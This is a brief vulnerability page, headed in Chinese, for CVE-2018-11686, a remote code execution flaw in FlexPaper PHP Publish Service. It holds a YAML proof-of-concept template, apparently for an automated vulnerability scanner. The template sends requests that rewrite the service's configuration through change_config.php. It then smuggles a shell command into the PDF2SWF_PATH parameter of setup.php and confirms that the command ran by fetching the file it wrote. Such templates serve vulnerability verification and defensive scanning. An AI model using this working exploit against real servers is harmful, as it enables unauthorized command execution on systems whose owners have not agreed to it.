漏洞描述
FlexPaper PHP Publish Service RCE
CVE-2018-11686: FlexPaper PHP Publish Service RCE
PoC代码[已公开]
id: CVE-2018-11686
info:
name: FlexPaper PHP Publish Service RCE
author: Soveless
severity: critical
description: |-
FlexPaper PHP Publish Service RCE
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2018-11686
tags: cve,cve2018:flexpaper,rce
created: 2023/08/10
set:
fileName: randomLowercase(6)
verifyStr: randomLowercase(6)
rules:
r0:
request:
method: POST
path: /php/change_config.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
SAVE_CONFIG=1&PDF_Directory=a&SWF_Directory=config/&LICENSEKEY=a&SPLITMODE=a&RenderingOrder_PRIM=a&RenderingOrder_SEC=a
expression: response.status == 302 || response.status == 200
r1:
request:
method: POST
path: /php/change_config.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
SAVE_CONFIG=1&PDF_Directory=a&SWF_Directory=config/&LICENSEKEY=a&SPLITMODE=a&RenderingOrder_PRIM=a&RenderingOrder_SEC=a
expression: response.status == 302 || response.status == 200
r2:
request:
method: GET
path: /php/setup.php?step=2&PDF2SWF_PATH=printf%20{{verifyStr}}%25%25{{verifyStr}}%20%3e%20{{fileName}}
follow_redirects: false
expression: response.status == 200
r3:
request:
method: GET
path: /php/{{fileName}}pdf2swf
expression: response.status == 200 && response.body.bcontains(bytes(string(verifyStr + "%" + verifyStr)))
expression: r0() && r1() && r2() && r3()